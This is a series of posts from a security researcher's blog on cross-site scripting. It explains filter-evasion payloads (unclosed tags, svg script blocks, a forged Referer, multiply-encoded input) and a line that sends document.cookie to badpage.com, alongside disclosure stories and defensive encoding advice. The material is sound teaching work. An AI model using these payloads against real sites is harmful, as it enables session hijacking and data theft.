XSS

Ways you haven’t stopped my XSS, Number 3 – helped by the browser / website

Apologies for not having written one of these in a while, but I find that one of the challenges here is to not release details about vulnerable sites while they’re still vulnerable – and it can take oh, so long for web developers to get around to fixing these vulnerabilities.

And when they do, often there’s more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.

Sometimes, though, the time goes so slowly, and the world moves on in such a way that you realise nobody’s looking for the vulnerable site, so publishing details of its flaws without publishing details of its identity, should be completely safe.

Helped by the website

So, what sort of attack is actively aided by the website?

Overly-verbose error messages

My favourite “helped by the website” issues are error messages which will politely inform you how your attack failed, and occasionally what you can do to fix it.

Here’s an SQL example:

image

OK, so now I know I have a SQL statement that contains the sequence “' order by type asc, sequence desc” – that tells me quite a lot. There are two fields called “type” and “sequence”. And my single injected quote was enough to demonstrate the presence of SQL injection.

What about XSS help?

There’s a few web sites out there who will help you by telling you which characters they can’t handle in their search fields:

image

Now, the question isn’t “what characters can I use to attack the site?”, but “how do I get those characters into the site. [Usually it’s as simple as typing them into the URL instead of using the text box, sometimes it’s simply a matter of encoding]

Over-abundance of encoding / decoding

On the subject of encoding and decoding, I generally advise developers that they should document interface contracts between modules in their code, describing what the data is, what format it’s in, and what isomorphic mapping they have used to encode the data so that it is not possible to confuse it with its surrounding delimiters or code, and so that it’s possible to get the original string back.

An isomorphism, or 1:1 (“one to one”) mapping, in data encoding terms, is a means of making sure that each output can only correspond to one possible input, and vice versa.

Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode that data. Data arrives encoded? Decode it. Data arrives doubly-encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
parms = document.location.search.substr(1).split("&");
input = parms[1];
while (input != output) {
    output = input;
    input = unescape(output);
}

[That’s from memory, so I apologise if it’s a little incorrect in many, many other ways as well.]

Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.

This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.

Granted, I don’t think WAFs are much good, compared to actually fixing the code, but they can give you a moment’s piece to fix code, as long as your code doesn’t do things to actively prevent the WAF from being able to help.

Multiple tiers, each decoding

This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.

Spelling correction

image

OK, that’s illustrative, and it illustrates that Google doesn’t fall for this crap.

But it’s interesting how you’ll find occasionally that such a correction results in executing code.

Stopwords and notwords in searches

When finding XSS in searches, we often concentrate on failed searches – after all, in most product catalogues, there isn’t an item called “<script>prompt()</script>” – unless we put it there on a previous attack.

But often the more complex (and easily attacked) code is in the successful search results – so we want to trigger that page.

Sometimes there’s something called “script”, so we squeak that by (there’s a band called “The Script”, and very often writing on things is desribed as being in a “script” font), but now we have to build Javascript with other terms that match the item on display when we find “script”. Fortunately, there’s a list of words that most search engines are trained to ignore – they are called “stopwords”. These are words that don’t impact the search at all, such as “the”, “of”, “to”, “and”, “by”, etc – words that occur in such a large number of matching items that it makes no sense to allow people to search on those words. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue (“shirt”, “book”, etc).

Well, “alert” is simply “and”[0]+”blue”[1]+”the”[2]+”or”[1]+”the”[0], so you can build function names quickly from stopwords. Once you have String.FromCharCode as a function object, you can create many more strings and functions more quickly. For an extreme example of this kind of “building Javascript from minimal characters”, see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!)

“Notwords” aren’t a thing, but made the title seem more interesting – sometimes it’d be nice to slip in a string that isn’t a stopword, and isn’t going to be found in the search results. Well, many search functions have a grammar that allow us to say things like “I’d like all your teapots except for the ones made from steel” – or more briefly, “teapot !steel”.

How does this help us execute an attack?

Well, we could just as easily search for “<script> !prompt() </script>” – valid JavaScript syntax, which means “run the prompt() function, and return the negation of its result”. Well, too late, we’ve run our prompt command (or other commands). I even had “book !<script> !prompt()// !</script>” work on one occasion.

Helped by the browser

So, now that we’ve seen some examples of the server or its application helping us to exploit an XSS, what about the browser?

Carry on parsing

One of the fun things I see a lot is servers blocking XSS by ensuring that you can’t enter a complete HTML tag except for the ones they approve of.

So, if I can’t put that closing “>” in my attack, what am I to do? I can’t just leave it out.

Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets – they’re designed to close other tags, of course, not the one you’ve put in, but there they are anyway.

So, you inject “<script>prompt()</script>” and the server refuses you. You try “<script prompt() </script” and it’s allowed, but can’t execute.

So, instead, try a single tag, like “<img src=x onerror=prompt()>” – it’s rejected, because it’s a complete tag, so just drop off the terminating angle bracket. “<img src=x onerror=prompt()” – so that the next tag doesn’t interfere, add an extra space, or an “x=”:

<img src=x onerror=prompt() x=

If that gets injected into a <p> tag, it’ll appear as this:

<p><img src=x onerror=prompt() x=</p>

How’s your browser going to interpret that? Simple – open p tag, open img tag with src=x, onerror=prompt() and some attribute called “x”, whose value is “</p”.

If confused, close a tag automatically

Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.

Can’t get a “/” character into the page? Then you can’t close a <script> tag. Well, that’s OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isn’t valid in SVG. So… “<svg><script>prompt()<p>” will happily execute as if you’d provided the complete “<svg><script>prompt()</script></svg><p>”

There are many other examples where the browser will use some form of heuristic to “guess” what you meant, or rather to guess what the server meant with the code it sends to the browser with your injected data. See what happens when you leave your attack half-closed.

Can’t comment with // ? Try other comments

When injecting script, you often want to comment the remaining line after your injection, so it isn’t parsed – a failing parse results in none of your injected code being executed.

So, you try to inject “//” to make the rest of the line a comment. Too bad, all “/” characters are encoded or discarded.

Well, did you know that JavaScript in HTML treats “<!—” as a perfectly valid equivalent?

Different browsers help in different ways

Try attacks in different browsers, they each behave in subtly different ways.

Firefox doesn’t have an XSS filter. So it won’t prevent XSS attacks that way.

IE 11 doesn’t encode URI elements, so will sometimes work when your attack would otherwise be encoded.

Chrome – well, I don’t use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.

Well, I think that’s enough for now.

Hack Your Friends Next

My buddy Troy Hunt has a popular PluralSight training class called “Hack Yourself First”. This is excellent advice, as it addresses multiple ideas:

  • You have your own permission to hack your own site, which means you aren’t getting into trouble
  • Before looking outward, you get to see how good your own security is
  • Hacking yourself makes it less likely that when you open up to the Internet, you’ll get pwned
  • By trying a few attacks, you’ll get to see what things an attacker might try and how to fend them off

Plenty of other reasons, I’m sure. Maybe I should watch his training.

Every now and again, though, I’ll hack my friends as well. There are a few reasons for this, too:

  • I know enough not to actually break a site – this is important
  • My friends will generally rather hear from me than an attacker that they have an obvious flaw
  • Tools that I use to find vulnerabilities sometimes stay enabled in the background
  • It’s funny

Such is the way with my recent visit to troyhunt.com – I’ve been researching reflected XSS issues caused by including script in the Referrer header.

What’s the Referrer header?

Actually, there’s two places that hold the referrer, and it’s important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.

The Referrer header (actually misspelled as “Referer”) is an HTTP header that the browser sends as part of its request for a new web page. The Referrer header contains a URL to the old page that the browser had loaded and which triggered the browser to fetch the new page.

There are many rules as to when this Referrer header can, and can’t, be sent. It can’t be sent if the user typed a URL. It can’t be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern – and why you shouldn’t EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.

Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:

// AMJ
    if (oSession.oRequest.headers.Exists("Referer"))
        {
            if (oSession.oRequest.headers["Referer"].Contains("?"))
                oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
            else
                oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
        }
        else
            oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";

Something like this code was in place when I visited other recently reported vulnerable sites, but Troy’s I hit manually. Because fun.

JavaScript’s document.referrer

The other referrer is in Javascript, the document.referrer field. I couldn’t find any rules about when this is, or isn’t available. That suggests it’s available for use even in cases where the HTTP Referer header believes it is not safe to do so, at least in some browser or other.

Forging this is harder, and I’m not going to delve into it. I want you to know about it in case you’ve used the Referer header, and referrer-vulnerable code isn’t triggering. Avoids tearing your hair out.

Back to the discovery

So, lately I’ve been testing sites with a URL ending in the magic string ?"-prompt()-" – and happened to try it at Troy’s site, among others.

I’d seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [It’s not the only one by any means, but perhaps the most prevalent]. It’s difficult accurately reproducing this issue, because advertising mediators will send you to different advertisers each time you visit a site.

And so it was with great surprise that I tried this on Troy’s site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.

Through a URL parameter, I’m injecting script into a hosted component that unwisely includes the Referer header’s contents in its JavaScript without encoding and/or quoting it first.

It’s ONLY Reflected XSS

I hear that one all the time – no big deal, it’s only a reflected XSS, the most you can do with this is to abuse yourself.

Kind of, yeah. Here’s some of my reasons why Reflected XSS is important:

  • It’s an obvious flaw – it suggests your code is weak all over
  • It’s easy to fix – if you don’t fix the easy flaws, do you want me to believe you fix the hard ones?
  • An attacker can send a link to your trusted web site in a spam email, and have thousands of your users clicking on it and being exploited
  • It’s like you’ve hired a new developer on your web site – the good news is, you don’t have to pay them. The bad news is, they don’t turn up to design meetings, and may have completely different ideas about how your web site should work
  • The attacker can change content as displayed to your users without you knowing what changes are made
  • The attacker can redirect your users to other malicious websites, or to your competitors
  • The attacker can perform network scans of your users’ systems
  • The attacker can run keylogging – capturing your users’ username and password, for instance
  • The attacker can communicate with your users – with your users thinking it’s you
  • A reflected XSS can often become stored XSS, because you allow users of your forums / reviews / etc to post links to your site “because they’re safe, trusted links”
  • Once an attacker convinces one of your staff to visit the reflected XSS, the attack becomes internal. Your staff will treat the link as “trusted” and “safe”
  • Any XSS will tend to trump your XSRF protections.

So, for multiple values of “self” outside the attacker, you can abuse yourself with Reflected XSS.

Contacting the vendor and resolving

With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when it’s possible / easy.

Usually, the key is to find an email address at the vulnerable domain – but security@adsafeprotected.com wasn’t working, and I couldn’t find any hints of an actual web site at adsafeprotected.com for me to go look at.

Troy was able to start from the other direction – as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and get them to fix the issue.

“Developer Media” was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.

Sites that were previously vulnerable are now not vulnerable – at least not through that exact attack.

I count that as a win.

There’s more to learn here

Finally, some learning.

1. Reputational risk / impact

Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you can’t transfer reputational risk as easily. With different notifications, Troy’s brand could have been substantially damaged, as could Developer Media’s and Integral Ads’. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.

[As for my own reputational impact – you’re reading this blog entry, so that’s a positive.]

2. Good guy / bad guy hackers

This issue was easy to find. So it’s probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.

So you should test your site and see if it’s vulnerable to this, or similar, code. If you don’t feel like you’ll do a good job, employ a penetration tester or two.

3. Reducing risk by being paranoid (iframe protection)

There’s a thin line between “paranoia” and “good security practice”. Troy’s blog uses good security practice, by ensuring that all adverts are inside an iframe, where they can’t execute in Troy’s security context. While I could redirect his users, perhaps to a malicious or competing site, I wasn’t able to read his users’ cookies, or modify content on his blog.

There were many other hosts using adsafeprotected without being in an iframe.

Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.

4. Make yourself findable

If you’re a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.

Ideally, for each domain you handle, have the address security@example.com (where you replace “example.com” with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the “Contact Us” link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings they’re working on, and they’ll move on to notifying someone else rather than spend time looking for how to notify you.

5. Don’t use “safe”, “secure”, “protected” etc in your domain name

This just makes it more ironic when the inevitable vulnerability is found.

6. Vulns protected by XSS Filter are still vulns

As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.

That doesn’t make the vuln any less important to fix – all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.

There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.

7. Ad security is HARD

The web ad industry is at a crisis point, from my perspective.

Flash has what appear to be daily vulnerabilities, and yet it’s still seen to be the medium of choice for online advertising.

Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a ‘good’ ad when inspected by the ad hosting provider; display a bad ad, or do something malicious when displayed on customers’ computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.

Any ad that uses JavaScript is susceptible to common vulnerability methods.

Ad blockers are being run by more and more people – even institutions (one college got back 40% of their network bandwidth by employing ad blocking).

Web sites need to be funded. If you’re not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasn’t been tried yet]

8. Timing of bug reports is a challenge

I’ll admit, I was bored when I found the bug on Troy’s site on a weekend. I decided to contact him straight away, and he responded immediately.

This led to Developer Media being contacted late on a Sunday.

This is not exactly friendly of me and Troy – but at least we didn’t publish, and left it to the developers to decide whether to treat this as a “fire drill”.

A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you don’t publish until teams are actively working on / have resolved the problem.

9. Some browsers are safer – that doesn’t mean your web site is safe

There are people using old and poorly configured browsers everywhere. Perhaps they make up .1% of your users. If you have 100,000 users, that’s a hundred people who will be affected by issues with those browsers.

Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didn’t decode them. Technically, adsafeprotected’s server is not RFC compliant because of this, so Firefox isn’t really protecting anyone here.

Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.

Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.

Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you can’t turn off.

All these XSS filters can be turned off by setting a header in network traffic.

Nobody would do that.

Until such time as one of these browsers has a significant flaw in their XSS filter.

So, don’t rely on the XSS Filter to protect you – it can’t be complete, and it may wind up being disabled.

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHtml and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.

Ways you haven’t stopped my XSS, Number 2–backslash doesn’t encode quotes in HTML attributes

Last time in this series, I posted an example where XSS was possible because a site’s developer is unaware of the implications that his JavaScript is hosted inside of HTML.

This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc) methods don’t always apply to HTML.

The XSS mantra for HTML attributes

I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.

The context dictates what encoding you need, whether the context is “JavaScript string”, “JavaScript code”, “HTML attribute”, “HTML content”, “URL”, “CSS expression”, etc, etc.

In the case of HTML attributes, it’s actually fairly simple.

Unless you are putting a URL into an attribute, there are three simple rules:

  1. Every attribute’s value must be quoted, whether with single quotes or double quotes.
  2. If the quote you use appears in the attribute value, it must be encoded.
  3. You must encode any characters which could confuse the encoding. [Encode the encoding characters]

Seems easy, right?

This is all kinds of good, except when you run into a site where the developer hasn’t really thought about their encoding very well.

You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.

To HTML, the back-slash has no particular meaning.

I see this all the time – I want to inject script, but the site only lets me put user data into an attribute value:

<meta name="keywords" content="Wot I searched for">

That’s lovely. I’d like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:

<meta name="keywords" content=""><script>prompt(1)</script>">

The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:

<meta name="keywords" content="\"><script>prompt(1)</script>">

Nice try, Charlie, but that back-slash, it’s just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your ‘fix’ got broken as soon as you released it.

Oh, if only you had chosen the correct HTML encoding, and replaced my quote with “&quot;” [and therefore, also replace every “&” in my query with “&amp;”], we’d be happy.

And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security team’s guidance.

Exercise for the reader – how do you exploit this example if I don’t encode the quotes, but I do strip out angle brackets?

Ways you haven’t stopped my XSS–Number 1, JavaScript Strings

I saw this again today. I tried smiling, but could only manage a weak grin.

You think you’ve defeated my XSS attack. How did you do that?

Encoding or back-slash quoting the back-slash and quote characters in JavaScript strings

Sure, I can no longer turn this:

<script>
s_prop0="[user-input here]";
</script>.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }

into this, by providing user input that consists of ";nefarious();// :

<script>
s_prop0="";nefarious();//";
</script>

.csharpcode, .csharpcode pre
{
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
{
background-color: #f4f4f4;
width: 100%;
margin: 0em;
}
.csharpcode .lnum { color: #606060; }

Instead, I get this:

<script>
s_prop0="\";nefarious();//";
</script>

.csharpcode, .csharpcode pre
{
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
{
background-color: #f4f4f4;
width: 100%;
margin: 0em;
}
.csharpcode .lnum { color: #606060; }

But, and this surprises many web developers, if that’s all you’ve done, I can still close that script tag.

INSIDE THE STRING

Yes, that’s bold, italic and underlined, because developers see this, and think “I have no idea how to parse this”:

<script>
s_prop0="</script><script>nefarious();</script>";
</script>

Fortunately, your browser does.

First it parses it as HTML.

This is important.

The HTML parser knows nothing about your JavaScript, it uses HTML rules to parse HTML bodies, and to figure out where scripts start and end.

So, when the HTML parser sees “<script>”, it creates a buffer. It starts filling that buffer with the first character after the tag, and it ends it with whatever character precedes the very next “</script>” tag it sees.

This means the HTML above gets interpreted as:

1. a block of script that won’t run, because it’s not complete code and generates a syntax error.

s_prop="

2. a block of script that will run, because it parses properly.

nefarious();

3. a double-quote character, a semi-colon, and an unnecessary end tag that it discards

Obviously, your code is more complex than mine, so this kind of injection has all kinds of nasty effects – but it’s possible for an attacker to hide those (not that the attacker needs to!)

So then, the fix is … what?

If you truly have to insert data from users into a JavaScript string, remember what it’s embedded in – HTML.

There are three approaches:

  1. Validate.

    If at all possible, discard characters willy-nilly. Does the user really need to input anything other than alphanumeric characters and spaces? Maybe you can just reject all those other characters.
  2. Encode.

    Yeah, you fell afoul of encoding, but let’s think about it scientifically this time.

    What are you embedded in? A JavaScript string embedded in HTML. You can’t HTML-encode your JavaScript content (try it and you’ll see it doesn’t work that way), so you have to JavaScript-string-encode anything that might make sense either to the HTML parser OR the JavaScript parser.

    You know I don’t like blacklists, but in this case, the only characters you actually need to encode are the double-quote, the back-slash (because otherwise you can’t uniquely reverse the encoding), and either the less-than or forward-slash.

    But, since I don’t like blacklists, I’d rather you chose to encode everything other than alphanumeric and spaces – it doesn’t cost that much.

  3. Span / Div.

    OK, this is a weird idea, but if you care to follow me, how about putting the user-supplied data into a hidden <span> or <div> element?

    Give it an id, and the JavaScript can reference it by that id. This means you only have to protect the user-supplied data in one place, and it won’t appear a dozen times throughout the document.

A note on why I don’t like the blacklists

OK, aside from last weekend’s post, where I demonstrated how a weak blacklist is no defence, it’s important to remember that the web changes day by day. Not every browser is standard, and they each try to differentiate themselves from the other browsers by introducing “killer features” that the other browsers don’t have for a few weeks.

As a result, you can’t really rely on the HTML standard as the one true documentation of all things a browser may do to your code.

Tags change, who knows if tomorrow a <script> tag might not be “pausable” by a <pause>Some piece of text</pause> tag? Ludicrous, maybe, until someone decides it’s a good idea. Or something else.

As a result, if you want to be a robust developer who produces robust code, you need to think less in terms of “what’s the minimum I have to encode?”, and more in terms of “what’s the cost of encoding, and what’s the cost of failure if I don’t encode something that needs it?”

In which a coffee store learns not to blacklist

I’ve been playing a lot lately with cross-site scripting (XSS) – you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.

Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.

And to a certain extent, that’s deserved.

But I always report what I find, and I don’t blog about it until I’m sure the company has fixed the issue.

So, coffee store, we’re talking Starbucks, right?

Right, and having known a few people who’ve worked in the Starbucks security team, I was surprised that I could find anything at all.

Yet it practically shouted at me, as soon as I started to inject script:

0-oops

Well, there’s pretty much a hint that Starbucks have something in place to prevent script.

But it’s not the only thing preventing script, as I found with a different search:

1-prompt

So, one search takes me to an “oops” page, another takes me to a page telling me that nothing happened – but without either one executing the script.

The oops page doesn’t include any of my script, so I don’t like that page – it doesn’t help my injection at all.

The search results page, however, that includes some of my script, so if I can just make that work for me, I’ll be happy.

Viewing source is pretty helpful, so here’s what I get from that, plus searching for my injected script:

2-social

So, while my intended JavaScript, “”-prompt(1)-“”, is not executed, and indeed is in the wrong context to be executed, every character has successfully made it into the source sent back to the user’s browser.

At this point, I figure that I need to find some execution that is appropriate for this context.

Maybe the XSS fish will help, so I search for that:

3-XSSFish

Looks promising – no “oops”, let’s check the source:

4-XSSFishSrc

This is definitely working. At this point, I know the site has XSS, I just have to demonstrate it. If I was a security engineer at Starbucks, this would be enough to cause me to go beat some heads about.

I think I should stress that. If you ever reach this point, you should fix your code.

This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all we’re debating about is how much I can do now that I’ve broken in.

And yet, I must go on.

I have to go on at this point, because I’m an external researcher to this company. I have to deliver to them a definite breach, or they’ll probably dismiss me as a waste of time.

The obvious thing to inject here is “”><script>prompt(1)</script>” – but we saw earlier that produced an “oops” page. We’ve seen that “prompt(1)” isn’t rejected, and the angle-brackets (chevrons, less-than / greater-than signs, etc, whatever you want to call them) aren’t rejected, so it must be the word “script”.

That, right there, is enough to tell me that instead of encoding the output (which would turn those angle-brackets into “&lt;” and “&gt;” in the source code, while still looking like angle-brackets in the display), this site is using a blacklist of “bad words to search for”.

Why is a blacklist wrong?

That’s a really good question – and the basic answer is because you just can’t make most blacklists complete. Only if you have a very limited character set, and a good reason to believe that your blacklist can be complete.

A blacklist that might work is to say that you surround every HTML tag’s attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.

I say it “might work”, because in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.
